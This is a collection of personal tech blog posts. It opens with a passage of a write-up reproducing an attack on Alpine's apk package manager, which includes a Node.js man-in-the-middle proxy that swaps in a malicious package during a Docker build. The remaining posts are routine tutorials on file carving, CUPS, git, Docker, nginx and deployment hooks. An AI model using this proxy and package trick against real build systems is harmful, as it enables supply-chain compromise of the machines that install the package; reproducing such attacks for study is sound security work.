link and to finish it will output the content of magic to the link which will be placed inside the <code class="highlighter-rouge">X</code> file. <em>Note</em>, I lost A LOT of time trying to see this behavior on <code class="highlighter-rouge">tar</code> it self, but it seems <code class="highlighter-rouge">tar</code> doesn’t have this behavior and <code class="highlighter-rouge">apk</code> implements it’s own extractor.</p>
<p>OK, now, we need to deliver this file when running the <code class="highlighter-rouge">apk add</code> inside docker. Here, I have updated /etc/hosts and pointed <code class="highlighter-rouge">dl-cdn.alpinelinux.org</code> to localhost. Using libraries <code class="highlighter-rouge">http-mitm-proxy http-proxy request</code> on node I have created a script to deliver the bad .apk when downloading something which has ltrace on url otherwise it will download the file and send to the docker.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var http = require('http'),
httpProxy = require('http-proxy'),
request = require('request'),
fileSystem = require('fs'),
path = require('path');
var proxy = httpProxy.createProxyServer({});
var server = http.createServer(function(req, res) {
console.log('http://nl.alpinelinux.org' + req.url)
if (req.url.indexOf('ltrace') > -1) {
console.log("Trapped")
var filePath = path.join(__dirname, 'bad-intention.apk');
var stat = fileSystem.statSync(filePath);
var readStream = fileSystem.createReadStream(filePath);
readStream.pipe(res);
} else {
proxy = request('http://nl.alpinelinux.org' + req.url)
proxy.on('response', function (a, b) {}).pipe(res);
}
});
console.log("listening on port 80")
server.listen(80);
</code></pre></div></div>
<p>Building my docker with <code class="highlighter-rouge">docker build -t alpinetest --network=host --no-cache .</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FROM alpine:3.8
# RUN apk add python
RUN apk add ltrace
CMD "/bin/sh"
</code></pre></div></div>
<p>(If you are curious you can take a look on the test of the docker image even if it failed to build and see your files are really inside the correct places. Use <code class="highlighter-rouge">docker commit CONTAINER_ID</code> and <code class="highlighter-rouge">docker run -it SHA256_STRING sh</code>.)</p>
<p>This returned “The command ‘/bin/sh -c apk add ltrace’ returned a non-zero code: 1”. This happened because <code class="highlighter-rouge">apk</code> verifies the signature or the apk and try to clean up the files, but it is not able to since <code class="highlighter-rouge">/etc/apk/commit_hooks.k</code> contains a file. How to do some magic to make the apk return exit code 0? Max has found one (or two) ways of doing this.</p>
<p>I still need to study what exactly the python script does to update the exit code but I have tested and it really works, as a quick test you can add <code class="highlighter-rouge">RUN apk add python</code> and update <code class="highlighter-rouge">folder_for_real_file/magic</code> to call his python code.</p>
<p>I know this may sound simple, but it took me a while to figure out all the tiny details. If you find any mistake I made, or want to say something, drop me a line!</p>
<p>Matheus</p>
Find images on chrome cache files (or any other file!)2018-08-20T00:00:00-05:00http://www.matbra.com/2018/08/20/find-images-on-chrome-cache-files-and-any-other<p>Good night,</p>
<p>Recently I have deleted a few images from my image which the old link was broken on the last few days. I decided to try to find them on the Google Chrome Cache.
The url <code class="highlighter-rouge">chrome://cache</code> was recently removed, but you can find your chrome cache files at: <code class="highlighter-rouge">/home/matheus/.cache/google-chrome/Default/Cache/</code>.</p>
<p>If you open it as binary, you will see it is not a file directly. There is more information embeded in the file such as URL, headers, http status code and others. We could take a look on chrome source code to extract everything from the file, not only images. But to be honest I was lazy to dig into that because I had a very specific need in this case. <a href="https://github.com/chromium/chromium/tree/f18e79d901f56154f80eea1e2218544285e62623/content/browser/cache_storage">Chrome cache storage</a></p>
<p>Why not scan the cache files for the JPEG binary? We would need to know how to find the start/end of image. We will have:</p>
<ul>
<li>bytes 0xFF, 0xD8 indicate start of image</li>
<li>bytes 0xFF, 0xD9 indicate end of image</li>
</ul>
<p>OK. So how would we do this in python?</p>
<p>Open the file as binary and check if there is a JFIF or EXIF marker on it. (Just trying to ignore files we can’t process)</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>f = open(filepath, 'rb')
data = f.read()
if 'JFIF' not in data and 'Exif' not in data:
return
</code></pre></div></div>
<p>Now let’s iterate over all the bytes trying to find that specific sequence. To achieve this let’s have a prev which will have the value of the previous byte, pos to know which position we’re at and an array for SOI (Start of image) and EOI (End of Image) which will hold the positions for this markers. If the previous char is FF and the current one is D8, it will append to SOI, if it is D9 it will append to EOI.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>prev = None
soi = []
eoi = []
pos = 0
for b in data:
if prev is None:
prev = b
pos = pos + 1
continue
if prev == chr(0xFF):
if b == chr(0xD8):
soi.append(pos-1)
elif b == chr(0xD9):
eoi.append(pos-1)
prev = b
pos = pos + 1
</code></pre></div></div>
<p>We can get the SOI e EOI and save it. The only magic we will be doing here is getting the first SOI and the last SOI or EOI depending on each one is bigger.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>path, filename = os.path.split(filepath)
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, 0), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2])
file.close()
print(filename, "SOI", soi, len(soi))
print(filename, "EOI", eoi, len(eoi))
</code></pre></div></div>
<p>This code will save only one image. If you want you could iterate over the SOI and EOI and save multiple files.</p>
<p>Would this be some kind of file carving?</p>
<p>I hope this helps you!
Matheus</p>
<p>Get this script create the OUTPUT_FOLDER and run it as <code class="highlighter-rouge">python yourfile.py filetocheck</code>, this version should be able to handle multiple images inside the same file. Now you can check and output stream for instance.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
import glob
import sys
OUTPUT_FOLDER = "output-this2"
def save_file(data, path, filename, count, eoi, soi):
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, count), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2])
file.close()
def extract(filepath):
count = 0
f = open(filepath, 'rb')
data = f.read()
if 'JFIF' not in data and 'Exif' not in data:
return
path, filename = os.path.split(filepath)
old_soi = []
old_eoi = []
prev = None
soi = []
eoi = []
eoi_found = False
pos = 0
for b in data:
if prev is None:
prev = b
pos = pos + 1
continue
if prev == chr(0xFF):
if b == chr(0xD8):
if eoi_found:
save_file(data, path, filename, count, eoi, soi)
old_soi = old_soi + soi
old_eoi = old_eoi + eoi
soi = []
eoi = []
count = count + 1
eoi_found = False
soi.append(pos-1)
elif b == chr(0xD9):
eoi.append(pos-1)
eoi_found = True
prev = b
pos = pos + 1
save_file(data, path, filename, count, eoi, soi)
print(filename, "SOI", soi, len(old_soi))
print(filename, "EOI", eoi, len(old_eoi))
def main():
if len(sys.argv) < 2:
sys.exit(1)
extract(sys.argv[1])
if __name__=="__main__":
main()
</code></pre></div></div>
<p>Reference:
<a href="https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images">https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images</a></p>
Printer connected to Raspberry PI accessable from network.2018-08-07T00:00:00-05:00http://www.matbra.com/2018/08/07/printer-connected-to-raspberry-pi-accessable-from-network<p>Hey guys,</p>
<p>For a long time my father has beem complaining that using the printer wasn’t practical enough, so to solve this I decided to add a Raspberry pi Zero W connected to my printer (HP Deskjet F2050) and share the printer using CUPS.</p>
<p>Initially you need to connect to your RPi and install CUPS.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt-get install cups
</code></pre></div></div>
<p>If you want to have a webinterface to configure it from your local network, update <code class="highlighter-rouge">/etc/cups/cupsd.conf</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo vim /etc/cups/cupsd.conf
</code></pre></div></div>
<p>Find the line:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Listen localhost:631
</code></pre></div></div>
<p>And update it to:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Listen localhost:631
Port 631
</code></pre></div></div>
<p>You will have multiple <code class="highlighter-rouge"><Location</code>, if you want to be able to access only from your computer, add <code class="highlighter-rouge">Allow from YOUR_IP</code> for every section. Example:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code><Location />
Order allow,deny
Allow from 10.0.0.2
</Location>
</code></pre></div></div>
<p>(If you want from any, use Allow from all)</p>
<p>Add your user (in my case PI) to <code class="highlighter-rouge">lpadmin</code> group.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo usermod -a -G lpadmin pi
</code></pre></div></div>
<p>Access your Raspberry Pi ip on your browser on port 631 (https://RPI_IP:631/).</p>
<p>Go to <code class="highlighter-rouge">Administration - Add printer</code> Menu. You should see your local printer there, select it and follow the wizard to setup it.</p>
<p>If you’re using HP printer and can’t find yours, try:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt-get install hplip
</code></pre></div></div>
<p>And reboot.</p>
<p>Let me know if you have any problems.</p>
<p>See you,
Matheus</p>
Update default git commit author and reset for commit.2018-08-06T00:00:00-05:00http://www.matbra.com/2018/08/06/update-default-git-commit-author-and-reset<p>If you would like to set your global git author, use:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config --global user.name "Your name"
git config --global user.email "email@example.net"
</code></pre></div></div>
<p>After having it set globally, you can to set your git author per project using:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config user.name "Your name"
git config user.email "email@example.net"
</code></pre></div></div>
<p>And a bonus, If you need to reset the git commit author:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git commit --amend --reset-author
</code></pre></div></div>
<p>If you want to do it for multiple commits:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git rebase -i <COMMIT_HASH>
</code></pre></div></div>
<p>See you,
Matheus</p>
Docker-compose with PHP-FPM, sendmail, nginx, mariadb serving jekyll and wordpress2018-02-06T00:00:00-06:00http://www.matbra.com/2018/02/06/docker-compose-with-php-fpm-nginx-maria-db-wordpress-jekyll<p>As I explained recently, I had a blog running Wordpress and decided to move to Jekyll but there was a catch, I didn’t want to loose any link I had to my wordpress blog, to achieve this, <a href="http://www.matbra.com/2016/12/22/nginx-redirect-multiserver.html">I setup an nginx which will try to find a static file from jekyll and if it is not found it will fallback to Wordpress</a>.</p>
<p>I was running my server on ec2 instance with RDS and it was becoming a little bit expensive, so I decided to move everything to one machine and dockerize my setup so I could easily switch my servers.</p>
<p>To achieve this, I have created a docker-compose with:</p>
<ul>
<li>PHP-FPM and sendmail to process php and sendmail</li>
<li>Nginx to serve jekyll static files and if they’re not found serve my old wordpress blog</li>
<li>MariaDB as my Database for Wordpress</li>
</ul>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>version: '3'
services:
fpm:
# image: php:7.0-fpm-alpine
build: php7fpm
restart: always
volumes:
- ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
- ./php7fpm/sendmail.mc:/usr/share/sendmail/cf/debian/sendmail.mc
- ./php7fpm/gmail-auth.db:/etc/mail/authinfo/gmail-auth.db
ports:
- "9000:9000"
links:
- mariadb
hostname: boarders.com.br
nginx:
image: nginx:1.10.1-alpine
restart: always
volumes:
- ./nginx/nginx.conf:/etc/nginx/nginx.conf
- ./nginx/app.vhost:/etc/nginx/conf.d/default.conf
- ./logs/nginx:/var/log/nginx
- ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
- ./jekyll.matbra.com/:/var/www/jekyll.matbra.com
ports:
- "80:80"
- "443:443"
links:
- fpm
mariadb:
image: mariadb
restart: always
environment:
- MYSQL_ROOT_PASSWORD=yourpassword
- MYSQL_DATABASE=
volumes:
- ./data/db:/var/lib/mysql
</code></pre></div></div>
<p>PHP-FPM container:</p>
<p>I’m using a custom Dockerfile which comes from php:7.0-fpm and add sendmail support and mysql extension. There is a custom starter script which will run sendmail + php-fpm. (I know I should create a specific container for sendmail)</p>
<p>On this container I’m basically mapping some php files and config files:</p>
<ul>
<li>./wordpress.matbra.com to /var/www/wordpress.matbra.com which are my wordpress files</li>
<li>./php7fpm/sendmail.mc to /usr/share/sendmail/cf/debian/sendmail.mc which is my configuration file for sendmail</li>
<li>./php7fpm/gmail-auth.db to /etc/mail/authinfo/gmail-auth.db which is the password for my gmail <a href="https://linuxconfig.org/configuring-gmail-as-sendmail-email-relay">Configuring gmail as relay to sendmail</a></li>
</ul>
<p>I’m also mapping the port 9000 to 9000, so I will communicate with PHP-FPM on this ports, creating a link to mariadb and naming my hostname.</p>
<p>NGINX container:</p>
<p>I’m using the regular nginx alpine with some maps:</p>
<ul>
<li>./nginx/nginx.conf to /etc/nginx/nginx.conf which is my nginx configuration</li>
<li>./nginx/app.vhost to /etc/nginx/conf.d/default.conf which is my website configuration with Jekyll falling back to wordpress</li>
<li>./logs/nginx to /var/log/nginx which will be my log directory</li>
<li>./wordpress.matbra.com/ to /var/www/wordpress.matbra.com which is the place where nginx can find wordpress website</li>
<li>./jekyll.matbra.com/ to /var/www/jekyll.matbra.com which is the place where nginx can find jekyll website</li>
</ul>
<p>I’m also mapping ports 80 to 80 and 443 to 443 and create a link to PHP-FPM so nginx can communicate with fpm container.</p>
<p>MARIADB container:</p>
<p>No mistery here, regular mariadb image, with a mapping for data and some environment variables.</p>
<p>Because I’m not adding my website files to the image, I have created a command <code class="highlighter-rouge">init.sh</code> to remove website directory and clone website from git. There is a command called <code class="highlighter-rouge">update-config.sh</code> to update wp-config.php file with the correct environment variables.</p>
<p>With this I can easily spin up a new machine with my website structure.</p>
<p><a href="https://github.com/x-warrior/blog-docker">https://github.com/x-warrior/blog-docker</a></p>
<p>I hope this will be helpful for you.
Matheus</p>
Install ZNC IRC Bouncer on AWS Linux2017-12-08T00:00:00-06:00http://www.matbra.com/2017/12/08/znc-on-aws-linux<p>If you want to install <a href="https://github.com/znc/znc">ZNC IRC Bouncer</a> you will need CMake, but AWS Linux CMake is too old. (Update your cmake to 3.x)[http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux.html]</p>
<p>Now you will need git to clone the ZNC source code and openssl-devel to have ssl support</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># yum install git openssl-devel
</code></pre></div></div>
<p>Clone ZNC source code</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/znc/znc.git
</code></pre></div></div>
<p>Enter on the source code folder</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd znc
</code></pre></div></div>
<p>Initialize submodules</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git submodule update --init --recursive
</code></pre></div></div>
<p>Install it with:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cmake .
$ make
# make install (run this as root #)
</code></pre></div></div>
<p>Configure it with:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ znc --makeconf
</code></pre></div></div>
<p>Best regards,
Matheus</p>
Install Cmake 3 on AWS Linux2017-12-07T00:00:00-06:00http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux<p>If you are trying to build something using CMake and is getting the error: “CMake 3.1 or higher is required. You are running version 2.8.12.2”</p>
<p>You can manually install this CMake version, to do this, I removed the previous CMake.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># yum remove cmake
</code></pre></div></div>
<p>Tested if it was really removed</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cmake
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-bash: /usr/bin/cmake: No such file or directory
</code></pre></div></div>
<p>Install G++</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># yum install gcc-c++
</code></pre></div></div>
<p>Download latest version from: <a href="https://cmake.org/download/">Cmake Download</a></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz
</code></pre></div></div>
<p>Extract it:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ tar -xvzf cmake-3.10.0.tar.gz
</code></pre></div></div>
<p>Enter on cmake folder</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd cmake-3.10.0
</code></pre></div></div>
<p>Install it with:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./bootstrap
# make
# make install
</code></pre></div></div>
<p>Now you should have cmake under /usr/local/bin/cmake</p>
<p>Best regards,
Matheus</p>
Loopback model migration using postgresql database2017-01-08T00:00:00-06:00http://www.matbra.com/2017/01/08/model-migrations-loopback<p>I have been playing with <a href="https://strongloop.com/node-js/loopback-framework/">Loopback</a>, initially I was just declaring models and use in memory, but now I got to a point where I need to have a persistent database.</p>
<p>I couldn’t find how to keep my database synced with my models easily. I’m not sure if I’m not that familiar with Loopback yet, or if their documentation is not clear enough.</p>
<p>To create a script to sync your models with your database you can create a file under bin/ called <code class="highlighter-rouge">autoupdate.js</code> and add the following:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var path = require('path');
var app = require(path.resolve(__dirname, '../server/server'));
var ds = app.datasources.db;
ds.autoupdate(function(err) {
if (err) throw err;
ds.disconnect();
});
</code></pre></div></div>
<p>The code is pretty simple, it will fetch the app from server.js, grab the datasource and run the <code class="highlighter-rouge">autoupate</code> command. You could use <code class="highlighter-rouge">automigrate</code>, but this one will clean the database every time, so pay attention on this.</p>
<p>I think this will work for most of datasources, but if it doesn’t work for yours, drop me a line. I can try to help :D</p>
<p>Matheus</p>
<p>PS: Loopback will not create migrations and do a proper job as Django, sometimes you can get to weird states, it seems Loopback works better with NoSQL databases.</p>
Django Storages with Boto3 and additional Metadata only for Media2016-12-29T00:00:00-06:00http://www.matbra.com/2016/12/29/django-storages-boto3-metadata-only-for-media<p>I have a personal project which I’m using python with Django and django-storages to upload my static and media files to Amazon S3, because my media files have UUID and they’re not editable on my system I wanted to have a long expiration time on it, so I could save some bandwidth but I didn’t want this on the static files which are updated more regularly when I’m updating the system.</p>
<p>Most of resources refer to <code class="highlighter-rouge">AWS_HEADERS</code> but it didn’t work for me. It seems it is only for boto (not boto3) after looking into boto3 source code I discovered <code class="highlighter-rouge">AWS_S3_OBJECT_PARAMETERS</code> which works for boto3, but this is a system-wide setting, so I had to extend <code class="highlighter-rouge">S3Boto3Storage</code>.</p>
<p>So the code that solved my problem was:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">class</span> <span class="nc">MediaRootS3Boto3Storage</span><span class="p">(</span><span class="n">S3Boto3Storage</span><span class="p">):</span>
<span class="n">location</span> <span class="o">=</span> <span class="s">'media'</span>
<span class="n">object_parameters</span> <span class="o">=</span> <span class="p">{</span>
<span class="s">'CacheControl'</span><span class="p">:</span> <span class="s">'max-age=604800'</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re using boto (not boto3) and you want to have specific parameters only for Media classes you could use</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">class</span> <span class="nc">MediaRootS3Boto3Storage</span><span class="p">(</span><span class="n">S3BotoStorage</span><span class="p">):</span>
<span class="n">location</span> <span class="o">=</span> <span class="s">'media'</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s">'CacheControl'</span><span class="p">:</span> <span class="s">'max-age=604800'</span>
<span class="p">}</span></code></pre></figure>
<p>You also need to update your django-storages settings, pay attention to the class name, on boto 3 it is S3Boto<strong>3</strong>Storage on boto it doesn’t has the 3 after Boto.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEFAULT_FILE_STORAGE = 'package.module.MediaRootS3Boto3Storage'
</code></pre></div></div>
<p>Very simple tip, but it took a while to find out how it works</p>
<p>Matheus</p>
Nginx redirect on failure2016-12-22T00:00:00-06:00http://www.matbra.com/2016/12/22/nginx-redirect-multiserver<p>As a few of you probably noticed, recently I have decided to <a href="http://www.matbra.com/2016/12/07/install-nginx-php-on-amazon-linux.html">update my really old wordpress blog from PHP4~5 to a most recent one</a>. Leaving a shared host and going to heroku, which later became Amazon EC2.</p>
<p>I had to decide if I would keep Wordpress, or change to a different technology as Jekyll? Or what? I have thought a lot about this and in the end I decided to use Jekyll to be honest, why? Because using something new will motivate me to study, play with something new and work more.</p>
<p>Have decided to work with Jekyll, I had to think about my domain, because I didn’t want to break my old wordpress blog, I want to keep it alive as a record and keep it for SEO points, but how to keep both living together on an awesome way?</p>
<p>I thought the ideal would be to have something that tries to access the new website and if it is not found it should redirect to the old wordpress website. But how to redirect to the old blog only when a page is not found and complying with the http status code (ie: redirecting with 301).</p>
<p>After some documentation reading on nginx I found you can try to proxy to a server and if it fails redirect to a new one, it seems the ideal solution for now.</p>
<p>I have a nginx configuration file with multiple servers, first I have a nginx wordpress configuration, this server just adds PHP-FPM to process PHP files basically with my own custom domain.</p>
<figure class="highlight"><pre><code class="language-nginx" data-lang="nginx"><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">wordpress.matbra.com</span><span class="p">;</span>
<span class="kn">location</span> <span class="n">/</span> <span class="p">{</span>
<span class="kn">root</span> <span class="n">/var/www/wordpress/live</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span> <span class="s">index.html</span> <span class="s">index.htm</span><span class="p">;</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="nv">$uri</span><span class="n">/</span> <span class="n">/index.php?</span><span class="nv">$uri$args</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">\.php$</span> <span class="p">{</span>
<span class="kn">root</span> <span class="n">/var/www/wordpress/live</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="s">unix:/var/run/php-fpm/php-fpm.sock</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="kn">include</span> <span class="s">fastcgi_params</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<!--more-->
<p>My second server is basically nginx serving static files for the new blog created with Jekyll:</p>
<figure class="highlight"><pre><code class="language-nginx" data-lang="nginx"><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">5000</span><span class="p">;</span>
<span class="kn">location</span> <span class="n">/</span> <span class="p">{</span>
<span class="kn">root</span> <span class="n">/var/www/jekyll/live/_site/</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.html</span> <span class="s">index.htm</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>So the most important server is the nginx server which will redirect when my jekyll server doesn’t find the url being requested. This one is a little bit more, I’m creating a nginx proxy which intercept errors with <code class="highlighter-rouge">proxy_intercept_errors on;</code> and on error page redirect to my secondary server wordpress using <code class="highlighter-rouge">error_page 404 = @wordpress;</code></p>
<p>If it is redirected to the wordpress page it will rewrite the url to the wordpress server.</p>
<figure class="highlight"><pre><code class="language-nginx" data-lang="nginx"><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">www.matbra.com</span> <span class="s">matbra.com</span><span class="p">;</span>
<span class="kn">location</span> <span class="n">/</span> <span class="p">{</span>
<span class="kn">proxy_intercept_errors</span> <span class="no">on</span><span class="p">;</span>
<span class="kn">error_page</span> <span class="mi">404</span> <span class="p">=</span> <span class="s">@wordpress</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">Host</span> <span class="nv">$http_host</span><span class="p">;</span>
<span class="kn">proxy_pass</span> <span class="s">http://127.0.0.1:5000</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="s">@wordpress</span> <span class="p">{</span>
<span class="kn">rewrite</span> <span class="s">^/(.*)</span> <span class="s">http://wordpress.matbra.com/</span><span class="nv">$1</span> <span class="s">permanent</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>So my configuration file is a composition from all of this.</p>
<p>What do you guys think? Do you have any question?</p>
<p>Matheus</p>
Build Jekyll as production after push2016-12-12T00:00:00-06:00http://www.matbra.com/2016/12/12/build-jekyll-on-push<p>If you want to build your Jekyll blog on your own server after a git push you can use git hooks. To do it, you can extend the <a href="/2016/12/09/deploy-after-git-push.html">Deploy after git push</a> and add this tree lines (after <code class="highlighter-rouge">rm -rf</code>), to install dependencies and to build it as production environment.</p>
<figure class="highlight"><pre><code class="language-sh" data-lang="sh"> <span class="nb">cd</span> <span class="nv">$LIVE_PATH</span>
bundle <span class="nb">install
</span><span class="nv">JEKYLL_ENV</span><span class="o">=</span>production jekyll build</code></pre></figure>
<p>Matheus</p>
Force www on Jekyll website using Javascript2016-12-11T00:00:00-06:00http://www.matbra.com/2016/12/11/jekyll-force-www<p>I wanted to force using my jekyll website to have the “www” prefix and because my Jekyll doesn’t have a back-end I couldn’t do it on the server, so I needed to use Javascript or Meta tags. A few people says Google Search engine handles meta refresh as 301/302 so it would be better to go with this approach from a SEO perspective.</p>
<p>If you want to force www prefix on your website using javascript, you can use this snippet:</p>
<figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o"><</span><span class="nx">script</span><span class="o">></span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">hostname</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="s2">"www"</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">location</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">protocol</span> <span class="o">+</span> <span class="s2">"//www."</span> <span class="o">+</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">hostname</span> <span class="o">+</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">pathname</span><span class="p">;</span>
<span class="p">}</span>
<span class="o"><</span><span class="sr">/script></span></code></pre></figure>
<p>I have created a <code class="highlighter-rouge">_include/force_www.html</code> file and I’m using <code class="highlighter-rouge">jekyll.environment</code> to load it, so I’m only loading it on production.</p>
<p>Matheus</p>
Set env var to PHP-FPM2016-12-10T00:00:00-06:00http://www.matbra.com/2016/12/10/set-env-var-for-fpm<p>After <a href="/2016/12/07/install-nginx-php-on-amazon-linux.html">installing nginx and php</a>, I wanted to use environment vars inside PHP 7 so I don’t need to save configuration to my repo.</p>
<p>Usually when using environment vars the ideal is to set it without having it saved in a file but on this case it was easier to.</p>
<p>If you want to add environment variables to your PHP-FPM you can edit <code class="highlighter-rouge">/etc/php-fpm.d/www.conf</code> (I’m doing it on Amazon Linux and PHP 7.0)</p>
<p>There is a flag <code class="highlighter-rouge">clear_env = no</code> where you’re able to set if php-fpm will receive a clean environment or not. I decided to leave it as the default value and but setting my vars as</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>env[WP_SECURE_AUTH_KEY] = "some-value"
env[WP_NONCE_KEY] = "nonce-key"
</code></pre></div></div>
<p>After this I restarted my nginx and php-fpm.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo service nginx restart
sudo service php-fpm restart
</code></pre></div></div>
<p>Matheus</p>
Deploy after push to your own git2016-12-09T00:00:00-06:00http://www.matbra.com/2016/12/09/deploy-after-git-push<p>I have explained <a href="/2016/12/08/pushing-to-your-own-remote-git.html">how to push your code to your own git server</a> and after this you may want to execute some especific functions, in my specific case I wanted my code to be builded and to release a new version, so I used <code class="highlighter-rouge">post-receive</code> hook from my repo.</p>
<p>Oh, it also handle multiple versions keeping the last 3 versions of the release. To do this it uses your DEPLOY_PATH and create a new folder sources on it, which will have your versions and a live folder which is a symlink to the version which is running.</p>
<p>Vars:</p>
<ul>
<li>REPO_PATH = Path to your git folder</li>
<li>DEPLOY_PATH = Path to your destiny folder</li>
<li>DEPLOY_BRANCH = Branch you want to deploy</li>
</ul>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="c">#!/bin/bash</span>
<span class="nv">REPO_PATH</span><span class="o">=</span>/home/someuser/test.git
<span class="nv">DEPLOY_PATH</span><span class="o">=</span>/var/www/
<span class="nv">DEPLOY_BRANCH</span><span class="o">=</span><span class="s2">"master"</span>
<span class="nb">echo</span> <span class="s2">"REPO_PATH=</span><span class="nv">$REPO_PATH</span><span class="s2">"</span>
<span class="nb">echo</span> <span class="s2">"DEPLOY_PATH=</span><span class="nv">$DEPLOY_PATH</span><span class="s2">"</span>
<span class="k">while </span><span class="nb">read </span>oldrev newrev refname
<span class="k">do
</span><span class="nv">branch</span><span class="o">=</span><span class="k">$(</span>git rev-parse <span class="nt">--symbolic</span> <span class="nt">--abbrev-ref</span> <span class="nv">$refname</span><span class="k">)</span>
<span class="k">if</span> <span class="o">[</span> <span class="nv">$DEPLOY_BRANCH</span> <span class="o">==</span> <span class="s2">"</span><span class="nv">$branch</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
</span><span class="nv">TIMESTAMP</span><span class="o">=</span><span class="k">$(</span><span class="nb">date</span> +%Y%m%d%H%M%S<span class="k">)</span>
<span class="nv">VERSION_PATH</span><span class="o">=</span><span class="nv">$DEPLOY_PATH</span>/sources/<span class="nv">$TIMESTAMP</span>
<span class="nv">LIVE_PATH</span><span class="o">=</span><span class="nv">$DEPLOY_PATH</span>/live
<span class="nb">echo</span> <span class="s2">"TIMESTAMP=</span><span class="nv">$TIMESTAMP</span><span class="s2">"</span>
<span class="nb">echo</span> <span class="s2">"VERSION_PATH=</span><span class="nv">$VERSION_PATH</span><span class="s2">"</span>
